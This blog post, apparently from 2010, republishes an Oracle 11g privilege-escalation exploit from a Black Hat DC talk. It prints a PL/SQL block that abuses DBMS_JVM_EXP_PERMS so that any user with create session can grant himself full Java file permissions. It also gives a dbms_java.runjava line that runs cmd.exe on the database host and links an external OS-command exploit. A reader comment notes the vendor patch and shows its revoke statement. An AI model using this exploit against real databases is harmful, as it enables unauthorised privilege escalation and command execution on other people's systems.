Hacking Oracle 11g

David Litchfield’s slides from Blackhat DC 2010 are now online. Here is the 0day from his slides, which work even on 11g R2:

Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

Once the Java permissions are available, an end user can simple create a procedure and execute OS command from this procedure (http://milw0rm.com/exploits/2837).

However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:

select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

Here is the link of the talk video:
https://media.blackhat.com/bh-dc-10/video/Litchfield_David/BlackHat-DC-2010-Litchfield-DefeatSSL-video.mov

———————–
Advert: Testking offers you guaranteed success through use of latest 000-025 questions, 000-076 study guides and 000-081 practice tests.

7 Thoughts on “Hacking Oracle 11g

  1. Pingback: Alexander Kornbrust Oracle Security Blog » Blog Archive » Oracle 11g 0day exploit published

  2. Pingback: Gildus» Blog Archive » Las bases de datos de Oracle pueden hackearse remotamente

  3. Pingback: Bug in Oracle 11g « Shimoon Security

  4. i like this post. great post and great blog.

  5. Stuart on August 11, 2010 at 1:59 am said:

    The 11.2.0.1 April CPU patch fixes this.

    Check out the last lines of the jvm_exp.sql script:

    9454036/files/javavm/install/jvm_exp.sql

    begin
    initjvmaux.exec(‘revoke execute on sys.dbms_jvm_exp_perms from PUBLIC’);
    exception
    when others then
    if sqlcode not in (-01927, -06550, -06512) then raise; end if;
    end;
    /

    A user with create session privileges can no longer see DBMS_JVM_EXP_PERMS after applying the patch.

  6. Pingback: Hack all the world - Metasploit oracle windows - Focusecurity.Org

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Post Navigation